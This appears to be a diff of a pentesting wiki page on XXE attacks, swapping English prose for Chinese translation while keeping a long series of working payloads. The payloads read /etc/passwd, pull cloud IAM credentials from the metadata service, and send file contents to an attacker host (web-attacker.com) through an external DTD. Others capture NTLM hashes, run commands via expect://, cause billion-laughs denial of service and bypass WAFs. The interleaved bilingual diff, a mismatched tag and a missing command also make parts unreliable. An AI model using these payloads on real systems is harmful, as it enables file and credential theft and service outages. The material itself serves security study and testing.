 <!DOCTYPE foo [<!ENTITY toreplace "3"> ]>
 <stockCheck>
-    <productId>&toreplace;</productId>
-    <storeId>1</storeId>
+<productId>&toreplace;</productId>
+<storeId>1</storeId>
 </stockCheck>
 ```
-
 ![](<../images/image (870).png>)
 
-### Read file
+### 读取文件
 
-Lets try to read `/etc/passwd` in different ways. For Windows you could try to read: `C:\windows\system32\drivers\etc\hosts`
-
-In this first case notice that SYSTEM "_\*\*file:///\*\*etc/passwd_" will also work.
+让我们尝试以不同的方式读取 `/etc/passwd`。对于 Windows，你可以尝试读取: `C:\windows\system32\drivers\etc\hosts`
 
+在这种情况下，请注意 SYSTEM "_\*\*file:///\*\*etc/passwd_" 也会有效。
 ```xml
 <!--?xml version="1.0" ?-->
 <!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
 <data>&example;</data>
 ```
-
 ![](<../images/image (86).png>)
 
-This second case should be useful to extract a file if the web server is using PHP (Not the case of Portswiggers labs)
-
+这个第二个案例应该有助于提取文件，如果web服务器使用PHP（Portswiggers实验室的情况除外）
 ```xml
 <!--?xml version="1.0" ?-->
 <!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
 <data>&example;</data>
 ```
-
-In this third case notice we are declaring the `Element stockCheck` as ANY
-
+在这个第三个案例中，请注意我们将 `Element stockCheck` 声明为 ANY。
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE data [
@@ -68,17 +61,15 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
 <!ENTITY file SYSTEM "file:///etc/passwd">
 ]>
 <stockCheck>
-    <productId>&file;</productId>
-    <storeId>1</storeId>
+<productId>&file;</productId>
+<storeId>1</storeId>
 </stockCheck3>
 ```
-
 ![](<../images/image (753).png>)
 
-### Directory listing
-
-In **Java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like (just asking for the directory instead of the file):
+### 目录列表
 
+在**Java**基础的应用程序中，可能通过XXE使用类似的有效载荷**列出目录的内容**（只请求目录而不是文件）：
 ```xml
 <!-- Root / -->
 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>
@@ -86,223 +77,197 @@ In **Java** based applications it might be possible to **list the contents of a
 <!-- /etc/ -->
 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>
 ```
-
 ### SSRF
 
-An XXE could be used to abuse a SSRF inside a cloud
-
+XXE 可以被用来滥用云中的 SSRF
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
 <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
 ```
-
 ### Blind SSRF
 
-Using the **previously commented technique** you can make the server access a server you control to show it's vulnerable. But, if that's not working, maybe is because **XML entities aren't allowed**, in that case you could try using **XML parameter entities**:
-
+使用**之前提到的技术**，您可以让服务器访问您控制的服务器，以显示其存在漏洞。但是，如果这不起作用，可能是因为**不允许使用XML实体**，在这种情况下，您可以尝试使用**XML参数实体**：
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://gtd8nhwxylcik0mt2dgvpeapkgq7ew.burpcollaborator.net"> %xxe; ]>
 <stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
 ```
+### "盲" SSRF - 通过带外方式提取数据
 
-### "Blind" SSRF - Exfiltrate data out-of-band
+**在这种情况下，我们将使服务器加载一个带有恶意负载的新 DTD，该负载将通过 HTTP 请求发送文件的内容（对于多行文件，您可以尝试通过 \_ftp://**\_ 来提取，例如使用这个基本服务器 [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**）。这个解释基于** [**Portswiggers 实验室**](https://portswigger.net/web-security/xxe/blind)**。**
 
-**In this occasion we are going to make the server load a new DTD with a malicious payload that will send the content of a file via HTTP request (for multi-line files you could try to ex-filtrate it via \_ftp://**\_ using this basic server for example [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**). This explanation is based in** [**Portswiggers lab here**](https://portswigger.net/web-security/xxe/blind)**.**
+在给定的恶意 DTD 中，执行了一系列步骤以提取数据：
 
-In the given malicious DTD, a series of steps are conducted to exfiltrate data:
-
-### Malicious DTD Example:
-
-The structure is as follows:
+### 恶意 DTD 示例：
 
+结构如下：
 ```xml
 <!ENTITY % file SYSTEM "file:///etc/hostname">
 <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
 %eval;
 %exfiltrate;
 ```
+该 DTD 执行的步骤包括：
 
-The steps executed by this DTD include:
+1. **参数实体的定义：**
+- 创建一个 XML 参数实体 `%file`，读取 `/etc/hostname` 文件的内容。
+- 定义另一个 XML 参数实体 `%eval`。它动态声明一个新的 XML 参数实体 `%exfiltrate`。`%exfiltrate` 实体被设置为向攻击者的服务器发起 HTTP 请求，在 URL 的查询字符串中传递 `%file` 实体的内容。
+2. **实体的执行：**
+- 使用 `%eval` 实体，导致动态声明 `%exfiltrate` 实体的执行。
+- 然后使用 `%exfiltrate` 实体，触发对指定 URL 的 HTTP 请求，包含文件的内容。
 
-1. **Definition of Parameter Entities:**
-   - An XML parameter entity, `%file`, is created, reading the content of the `/etc/hostname` file.
-   - Another XML parameter entity, `%eval`, is defined. It dynamically declares a new XML parameter entity, `%exfiltrate`. The `%exfiltrate` entity is set to make an HTTP request to the attacker's server, passing the content of the `%file` entity within the query string of the URL.
-2. **Execution of Entities:**
-   - The `%eval` entity is utilized, leading to the execution of the dynamic declaration of the `%exfiltrate` entity.
-   - The `%exfiltrate` entity is then used, triggering an HTTP request to the specified URL with the file's contents.
-
-The attacker hosts this malicious DTD on a server under their control, typically at a URL like `http://web-attacker.com/malicious.dtd`.
-
-**XXE Payload:** To exploit a vulnerable application, the attacker sends an XXE payload:
+攻击者在其控制的服务器上托管此恶意 DTD，通常位于类似 `http://web-attacker.com/malicious.dtd` 的 URL。
 
+**XXE Payload:** 为了利用一个易受攻击的应用程序，攻击者发送一个 XXE payload：
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
 <stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
 ```
+这个有效负载定义了一个 XML 参数实体 `%xxe` 并将其纳入 DTD。当被 XML 解析器处理时，这个有效负载从攻击者的服务器获取外部 DTD。然后解析器内联解释 DTD，执行恶意 DTD 中概述的步骤，导致 `/etc/hostname` 文件被外泄到攻击者的服务器。
 
-This payload defines an XML parameter entity `%xxe` and incorporates it within the DTD. When processed by an XML parser, this payload fetches the external DTD from the attacker's server. The parser then interprets the DTD inline, executing the steps outlined in the malicious DTD and leading to the exfiltration of the `/etc/hostname` file to the attacker's server.
+### 基于错误的（外部 DTD）
 
-### Error Based(External DTD)
+**在这种情况下，我们将使服务器加载一个恶意 DTD，该 DTD 将在错误消息中显示文件的内容（仅在您可以看到错误消息时有效）。** [**示例来自这里。**](https://portswigger.net/web-security/xxe/blind)
 
-**In this case we are going to make the server loads a malicious DTD that will show the content of a file inside an error message (this is only valid if you can see error messages).** [**Example from here.**](https://portswigger.net/web-security/xxe/blind)
+可以通过恶意外部文档类型定义（DTD）触发一个 XML 解析错误消息，揭示 `/etc/passwd` 文件的内容。这是通过以下步骤完成的：
 
-An XML parsing error message, revealing the contents of the `/etc/passwd` file, can be triggered using a malicious external Document Type Definition (DTD). This is accomplished through the following steps:
-
-1. An XML parameter entity named `file` is defined, which contains the contents of the `/etc/passwd` file.
-2. An XML parameter entity named `eval` is defined, incorporating a dynamic declaration for another XML parameter entity named `error`. This `error` entity, when evaluated, attempts to load a nonexistent file, incorporating the contents of the `file` entity as its name.
-3. The `eval` entity is invoked, leading to the dynamic declaration of the `error` entity.
-4. Invocation of the `error` entity results in an attempt to load a nonexistent file, producing an error message that includes the contents of the `/etc/passwd` file as part of the file name.
-
-The malicious external DTD can be invoked with the following XML:
+1. 定义一个名为 `file` 的 XML 参数实体，其中包含 `/etc/passwd` 文件的内容。
+2. 定义一个名为 `eval` 的 XML 参数实体，包含对另一个 XML 参数实体 `error` 的动态声明。当评估这个 `error` 实体时，尝试加载一个不存在的文件，将 `file` 实体的内容作为其名称。
+3. 调用 `eval` 实体，导致 `error` 实体的动态声明。
+4. 调用 `error` 实体导致尝试加载一个不存在的文件，产生一个错误消息，其中包含 `/etc/passwd` 文件的内容作为文件名的一部分。
 
+可以使用以下 XML 调用恶意外部 DTD：
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
 <stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
 ```
-
-Upon execution, the web server's response should include an error message displaying the contents of the `/etc/passwd` file.
+执行后，web 服务器的响应应包含一个错误消息，显示 `/etc/passwd` 文件的内容。
 
 ![](<../images/image (809).png>)
 
-_**Please notice that external DTD allows us to include one entity inside the second (\*\***`eval`\***\*), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).**_
+_**请注意，外部 DTD 允许我们在第二个实体内部包含一个实体（\*\***`eval`\***\*），但在内部 DTD 中是禁止的。因此，通常情况下，您无法在不使用外部 DTD 的情况下强制产生错误。**_
 
-### **Error Based (system DTD)**
+### **基于错误（系统 DTD）**
 
-So what about blind XXE vulnerabilities when **out-of-band interactions are blocked** (external connections aren't available)?.
+那么，当 **出带外交互被阻止**（外部连接不可用）时，盲 XXE 漏洞怎么办？
 
-A loophole in the XML language specification can **expose sensitive data through error messages when a document's DTD blends internal and external declarations**. This issue allows for the internal redefinition of entities declared externally, facilitating the execution of error-based XXE attacks. Such attacks exploit the redefinition of an XML parameter entity, originally declared in an external DTD, from within an internal DTD. When out-of-band connections are blocked by the server, attackers must rely on local DTD files to conduct the attack, aiming to induce a parsing error to reveal sensitive information.
-
-Consider a scenario where the server's filesystem contains a DTD file at `/usr/local/app/schema.dtd`, defining an entity named `custom_entity`. An attacker can induce an XML parsing error revealing the contents of the `/etc/passwd` file by submitting a hybrid DTD as follows:
+XML 语言规范中的一个漏洞可以 **通过错误消息暴露敏感数据，当文档的 DTD 混合内部和外部声明时**。这个问题允许内部重新定义外部声明的实体，从而促进基于错误的 XXE 攻击的执行。这种攻击利用了在外部 DTD 中最初声明的 XML 参数实体的重新定义，从内部 DTD 中进行。当服务器阻止出带外连接时，攻击者必须依赖本地 DTD 文件进行攻击，旨在诱发解析错误以揭示敏感信息。
 
+考虑一个场景，其中服务器的文件系统在 `/usr/local/app/schema.dtd` 中包含一个 DTD 文件，定义了一个名为 `custom_entity` 的实体。攻击者可以通过提交一个混合 DTD 来诱发 XML 解析错误，从而揭示 `/etc/passwd` 文件的内容，如下所示：
 ```xml
 <!DOCTYPE foo [
-    <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
-    <!ENTITY % custom_entity '
-        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
-        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file&#x27;>">
-        &#x25;eval;
-        &#x25;error;
-    '>
-    %local_dtd;
+<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
+<!ENTITY % custom_entity '
+<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file&#x27;>">
+&#x25;eval;
+&#x25;error;
+'>
+%local_dtd;
 ]>
 ```
+所述步骤由此 DTD 执行：
 
-The outlined steps are executed by this DTD:
-
-- The definition of an XML parameter entity named `local_dtd` includes the external DTD file located on the server's filesystem.
-- A redefinition occurs for the `custom_entity` XML parameter entity, originally defined in the external DTD, to encapsulate an [error-based XXE exploit](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages). This redefinition is designed to elicit a parsing error, exposing the contents of the `/etc/passwd` file.
-- By employing the `local_dtd` entity, the external DTD is engaged, encompassing the newly defined `custom_entity`. This sequence of actions precipitates the emission of the error message aimed for by the exploit.
-
-**Real world example:** Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso`
+- XML 参数实体 `local_dtd` 的定义包括位于服务器文件系统上的外部 DTD 文件。
+- 对 `custom_entity` XML 参数实体进行重新定义，该实体最初在外部 DTD 中定义，以封装一个 [基于错误的 XXE 漏洞](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages)。此重新定义旨在引发解析错误，从而暴露 `/etc/passwd` 文件的内容。
+- 通过使用 `local_dtd` 实体，外部 DTD 被调用，包含新定义的 `custom_entity`。这一系列操作导致了漏洞所针对的错误消息的发出。
 
+**现实世界示例：** 使用 GNOME 桌面环境的系统通常在 `/usr/share/yelp/dtd/docbookx.dtd` 处有一个 DTD，包含一个名为 `ISOamso` 的实体。
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [
-    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
-    <!ENTITY % ISOamso '
-        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
-        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
-        &#x25;eval;
-        &#x25;error;
-    '>
-    %local_dtd;
+<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
+<!ENTITY % ISOamso '
+<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+&#x25;eval;
+&#x25;error;
+'>
+%local_dtd;
 ]>
 <stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
 ```
-
 ![](<../images/image (625).png>)
 
-As this technique uses an **internal DTD you need to find a valid one first**. You could do this **installing** the same **OS / Software** the server is using and **searching some default DTDs**, or **grabbing a list** of **default DTDs** inside systems and **check** if any of them exists:
-
+由于此技术使用**内部 DTD，您需要先找到一个有效的 DTD**。您可以通过**安装**服务器使用的相同**操作系统/软件**并**搜索一些默认 DTD**，或者**获取系统内的默认 DTD 列表**并**检查**它们是否存在：
 ```xml
 <!DOCTYPE foo [
 <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
 %local_dtd;
 ]>
 ```
+有关更多信息，请查看 [https://portswigger.net/web-security/xxe/blind](https://portswigger.net/web-security/xxe/blind)
 
-For more information check [https://portswigger.net/web-security/xxe/blind](https://portswigger.net/web-security/xxe/blind)
+### 在系统中查找 DTD
 
-### Finding DTDs inside the system
-
-In the following awesome github repo you can find **paths of DTDs that can be present in the system**:
+在以下精彩的 GitHub 仓库中，您可以找到 **可能存在于系统中的 DTD 路径**：
 
 {% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %}
 
-Moreover, if you have the **Docker image of the victim system**, you can use the tool of the same repo to **scan** the **image** and **find** the path of **DTDs** present inside the system. Read the [Readme of the github](https://github.com/GoSecure/dtd-finder) to learn how.
-
+此外，如果您拥有 **受害者系统的 Docker 镜像**，您可以使用同一仓库的工具来 **扫描** **镜像** 并 **查找** 系统中存在的 **DTD** 路径。请阅读 [GitHub 的 Readme](https://github.com/GoSecure/dtd-finder) 以了解如何操作。
 ```bash
 java -jar dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar
 
 Scanning TAR file /tmp/dadocker.tar
 
- [=] Found a DTD: /tomcat/lib/jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd
+[=] Found a DTD: /tomcat/lib/jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd
 Testing 0 entities : []
 
- [=] Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd
+[=] Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd
 Testing 0 entities : []
 ```
-
 ### XXE via Office Open XML Parsers
 
-For a more in depth explanation of this attack, **check the second section of** [**this amazing post**](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/) **from Detectify**.
+对于此攻击的更深入解释，**请查看** [**这篇精彩的文章**](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/) **来自 Detectify 的第二部分**。
 
-The ability to **upload Microsoft Office documents is offered by many web applications**, which then proceed to extract certain details from these documents. For instance, a web application may allow users to import data by uploading an XLSX format spreadsheet. In order for the parser to extract the data from the spreadsheet, it will inevitably need to parse at least one XML file.
+许多网络应用程序提供**上传 Microsoft Office 文档的功能**，然后提取这些文档中的某些细节。例如，网络应用程序可能允许用户通过上传 XLSX 格式的电子表格来导入数据。为了让解析器从电子表格中提取数据，它不可避免地需要解析至少一个 XML 文件。
 
-To test for this vulnerability, it is necessary to create a **Microsoft Office file containing an XXE payload**. The first step is to create an empty directory to which the document can be unzipped.
+要测试此漏洞，需要创建一个**包含 XXE 负载的 Microsoft Office 文件**。第一步是创建一个空目录，以便将文档解压缩到该目录中。
 
-Once the document has been unzipped, the XML file located at `./unzipped/word/document.xml` should be opened and edited in a preferred text editor (such as vim). The XML should be modified to include the desired XXE payload, often starting with an HTTP request.
+一旦文档被解压缩，位于 `./unzipped/word/document.xml` 的 XML 文件应在首选文本编辑器（如 vim）中打开并编辑。XML 应修改以包含所需的 XXE 负载，通常以 HTTP 请求开头。
 
-The modified XML lines should be inserted between the two root XML objects. It is important to replace the URL with a monitorable URL for requests.
+修改后的 XML 行应插入到两个根 XML 对象之间。重要的是将 URL 替换为可监控请求的 URL。
 
-Finally, the file can be zipped up to create the malicious poc.docx file. From the previously created "unzipped" directory, the following command should be run:
+最后，可以将文件压缩以创建恶意的 poc.docx 文件。从之前创建的 "unzipped" 目录中，应运行以下命令：
 
-Now, the created file can be uploaded to the potentially vulnerable web application, and one can hope for a request to appear in the Burp Collaborator logs.
+现在，创建的文件可以上传到潜在易受攻击的网络应用程序中，并希望在 Burp Collaborator 日志中出现请求。
 
 ### Jar: protocol
 
-The **jar** protocol is made accessible exclusively within **Java applications**. It is designed to enable file access within a **PKZIP** archive (e.g., `.zip`, `.jar`, etc.), catering to both local and remote files.
-
+**jar** 协议仅在**Java 应用程序**中可用。它旨在允许在**PKZIP** 存档（例如，`.zip`、`.jar` 等）中访问文件，适用于本地和远程文件。
 ```
 jar:file:///var/myarchive.zip!/file.txt
 jar:https://download.host.com/myarchive.zip!/file.txt
 ```
-
 > [!CAUTION]
-> To be able to access files inside PKZIP files is **super useful to abuse XXE via system DTD files.** Check [this section to learn how to abuse system DTD files](xxe-xee-xml-external-entity.md#error-based-system-dtd).
+> 能够访问 PKZIP 文件中的文件对通过系统 DTD 文件滥用 XXE **非常有用。** 查看 [本节以了解如何滥用系统 DTD 文件](xxe-xee-xml-external-entity.md#error-based-system-dtd)。
 
-The process behind accessing a file within a PKZIP archive via the jar protocol involves several steps:
+通过 jar 协议访问 PKZIP 存档中的文件的过程涉及几个步骤：
 
-1. An HTTP request is made to download the zip archive from a specified location, such as `https://download.website.com/archive.zip`.
-2. The HTTP response containing the archive is stored temporarily on the system, typically in a location like `/tmp/...`.
-3. The archive is then extracted to access its contents.
-4. The specific file within the archive, `file.zip`, is read.
-5. After the operation, any temporary files created during this process are deleted.
-
-An interesting technique to interrupt this process at the second step involves keeping the server connection open indefinitely when serving the archive file. Tools available at [this repository](https://github.com/GoSecure/xxe-workshop/tree/master/24_write_xxe/solution) can be utilized for this purpose, including a Python server (`slow_http_server.py`) and a Java server (`slowserver.jar`).
+1. 发出 HTTP 请求，从指定位置下载 zip 存档，例如 `https://download.website.com/archive.zip`。
+2. 包含存档的 HTTP 响应暂时存储在系统上，通常在 `/tmp/...` 位置。
+3. 然后提取存档以访问其内容。
+4. 读取存档中的特定文件 `file.zip`。
+5. 操作完成后，删除在此过程中创建的任何临时文件。
 
+在第二步中中断此过程的一个有趣技术是保持服务器连接在提供存档文件时无限期打开。可以利用 [这个仓库](https://github.com/GoSecure/xxe-workshop/tree/master/24_write_xxe/solution) 中的工具来实现这一目的，包括 Python 服务器 (`slow_http_server.py`) 和 Java 服务器 (`slowserver.jar`)。
 ```xml
 <!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:http://attacker.com:8080/evil.zip!/evil.dtd">]>
 <foo>&xxe;</foo>
 ```
-
 > [!CAUTION]
-> Writing files in a temporary directory can help to **escalate another vulnerability that involves a path traversal** (such as local file include, template injection, XSLT RCE, deserialization, etc).
+> 在临时目录中写入文件可以帮助**升级另一个涉及路径遍历的漏洞**（例如本地文件包含、模板注入、XSLT RCE、反序列化等）。
 
 ### XSS
-
 ```xml
 <![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>
 ```
-
 ### DoS
 
-#### Billion Laugh Attack
-
+#### 十亿笑声攻击
 ```xml
 <!DOCTYPE data [
 <!ENTITY a0 "dos" >
@@ -313,9 +278,7 @@ An interesting technique to interrupt this process at the second step involves k
 ]>
 <data>&a4;</data>
 ```
-
-#### Yaml Attack
-
+#### Yaml 攻击
 ```xml
 a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
 b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
@@ -327,81 +290,69 @@ g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
 h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
 i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
 ```
-
-#### Quadratic Blowup Attack
+#### 二次爆炸攻击
 
 ![](<../images/image (527).png>)
 
-#### Getting NTML
-
-On Windows hosts it is possible to get the NTML hash of the web server user by setting a responder.py handler:
+#### 获取 NTML
 
+在 Windows 主机上，可以通过设置 responder.py 处理程序来获取 web 服务器用户的 NTML 哈希：
 ```bash
 Responder.py -I eth0 -v
 ```
-
-and by sending the following request
-
+通过发送以下请求
 ```xml
 <!--?xml version="1.0" ?-->
 <!DOCTYPE foo [<!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'> ]>
 <data>&example;</data>
 ```
+然后你可以尝试使用 hashcat 破解哈希
 
-Then you can try to crack the hash using hashcat
-
-## Hidden XXE Surfaces
+## 隐藏的 XXE 表现
 
 ### XInclude
 
-When integrating client data into server-side XML documents, like those in backend SOAP requests, direct control over the XML structure is often limited, hindering traditional XXE attacks due to restrictions on modifying the `DOCTYPE` element. However, an `XInclude` attack provides a solution by allowing the insertion of external entities within any data element of the XML document. This method is effective even when only a portion of the data within a server-generated XML document can be controlled.
-
-To execute an `XInclude` attack, the `XInclude` namespace must be declared, and the file path for the intended external entity must be specified. Below is a succinct example of how such an attack can be formulated:
+在将客户端数据集成到服务器端 XML 文档中时，例如后端 SOAP 请求中的文档，通常对 XML 结构的直接控制是有限的，这使得由于对修改 `DOCTYPE` 元素的限制，传统的 XXE 攻击受到阻碍。然而，`XInclude` 攻击提供了解决方案，通过允许在 XML 文档的任何数据元素中插入外部实体。即使只能控制服务器生成的 XML 文档中的一部分数据，这种方法也是有效的。
 
+要执行 `XInclude` 攻击，必须声明 `XInclude` 命名空间，并指定所需外部实体的文件路径。以下是如何制定此类攻击的简洁示例：
 ```xml
 productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
 ```
+检查 [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) 以获取更多信息！
 
-Check [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) for more info!
+### SVG - 文件上传
 
-### SVG - File Upload
+用户上传到某些应用程序的文件，然后在服务器上处理，可能会利用 XML 或包含 XML 的文件格式处理中的漏洞。常见的文件格式如办公文档 (DOCX) 和图像 (SVG) 基于 XML。
 
-Files uploaded by users to certain applications, which are then processed on the server, can exploit vulnerabilities in how XML or XML-containing file formats are handled. Common file formats like office documents (DOCX) and images (SVG) are based on XML.
-
-When users **upload images**, these images are processed or validated server-side. Even for applications expecting formats such as PNG or JPEG, the **server's image processing library might also support SVG images**. SVG, being an XML-based format, can be exploited by attackers to submit malicious SVG images, thereby exposing the server to XXE (XML External Entity) vulnerabilities.
-
-An example of such an exploit is shown below, where a malicious SVG image attempts to read system files:
+当用户 **上传图像** 时，这些图像会在服务器端处理或验证。即使对于期望 PNG 或 JPEG 格式的应用程序，**服务器的图像处理库也可能支持 SVG 图像**。SVG 作为一种基于 XML 的格式，可能被攻击者利用来提交恶意 SVG 图像，从而使服务器暴露于 XXE (XML External Entity) 漏洞。
 
+下面展示了一个此类攻击的示例，其中恶意 SVG 图像试图读取系统文件：
 ```xml
 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="file:///etc/hostname"></image></svg>
 ```
-
-Another method involves attempting to **execute commands** through the PHP "expect" wrapper:
-
+另一种方法涉及尝试通过 PHP "expect" 包装器 **执行命令**：
 ```xml
 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
-    <image xlink:href="expect://ls"></image>
+<image xlink:href="expect://ls"></image>
 </svg>
 ```
+在这两种情况下，SVG 格式被用来发起攻击，利用服务器软件的 XML 处理能力，突显了对强大输入验证和安全措施的需求。
 
-In both instances, the SVG format is used to launch attacks that exploit the XML processing capabilities of the server's software, highlighting the need for robust input validation and security measures.
+查看 [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) 获取更多信息！
 
-Check [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) for more info!
+**注意，读取文件的第一行或执行结果将出现在创建的图像内部。因此，您需要能够访问 SVG 创建的图像。**
 
-**Note the first line of the read file or of the result of the execution will appear INSIDE the created image. So you need to be able to access the image SVG has created.**
+### **PDF - 文件上传**
 
-### **PDF - File upload**
-
-Read the following post to **learn how to exploit a XXE uploading a PDF** file:
+阅读以下帖子以**了解如何利用 XXE 上传 PDF** 文件：
 
 {{#ref}}
 file-upload/pdf-upload-xxe-and-cors-bypass.md
 {{#endref}}
 
-### Content-Type: From x-www-urlencoded to XML
-
-If a POST request accepts the data in XML format, you could try to exploit a XXE in that request. For example, if a normal request contains the following:
+### Content-Type: 从 x-www-urlencoded 到 XML
 
+如果 POST 请求接受 XML 格式的数据，您可以尝试在该请求中利用 XXE。例如，如果正常请求包含以下内容：
 ```xml
 POST /action HTTP/1.0
 Content-Type: application/x-www-form-urlencoded
@@ -409,9 +360,7 @@ Content-Length: 7
 
 foo=bar
 ```
-
-Then you might be able submit the following request, with the same result:
-
+然后您可能能够提交以下请求，得到相同的结果：
 ```xml
 POST /action HTTP/1.0
 Content-Type: text/xml
@@ -419,20 +368,18 @@ Content-Length: 52
 
 <?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
 ```
+### Content-Type: 从 JSON 到 XEE
 
-### Content-Type: From JSON to XEE
-
-To change the request you could use a Burp Extension named “**Content Type Converter**“. [Here](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) you can find this example:
-
+要更改请求，您可以使用一个名为“**Content Type Converter**”的 Burp 扩展。 [Here](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) you can find this example:
 ```xml
 Content-Type: application/json;charset=UTF-8
 
 {"root": {"root": {
-  "firstName": "Avinash",
-  "lastName": "",
-  "country": "United States",
-  "city": "ddd",
-  "postalCode": "ddd"
+"firstName": "Avinash",
+"lastName": "",
+"country": "United States",
+"city": "ddd",
+"postalCode": "ddd"
 }}}
 ```
 
@@ -442,32 +389,28 @@ Content-Type: application/xml;charset=UTF-8
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]>
 <root>
- <root>
-  <firstName>&xxe;</firstName>
-  <lastName/>
-  <country>United States</country>
-  <city>ddd</city>
-  <postalCode>ddd</postalCode>
- </root>
+<root>
+<firstName>&xxe;</firstName>
+<lastName/>
+<country>United States</country>
+<city>ddd</city>
+<postalCode>ddd</postalCode>
+</root>
 </root>
 ```
+另一个例子可以在 [这里](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2) 找到。
 
-Another example can be found [here](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2).
-
-## WAF & Protections Bypasses
+## WAF 和保护绕过
 
 ### Base64
-
 ```xml
 <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
 ```
-
-This only work if the XML server accepts the `data://` protocol.
+这仅在 XML 服务器接受 `data://` 协议时有效。
 
 ### UTF-7
 
